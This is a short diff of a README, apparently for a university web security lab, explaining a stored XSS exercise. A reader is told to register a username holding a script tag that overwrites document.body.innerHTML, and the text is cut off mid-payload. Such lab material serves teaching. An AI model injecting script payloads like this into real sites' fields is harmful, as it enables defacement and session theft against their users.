antongoransson/EITF05/README.md

 # XSS Attack

-* Create a user with username such as:
+* Create a user with username such as:(If it says username already in use, comment the $username line in addUser in db.php)
 ```
 <script>
 document.body.innerHTML=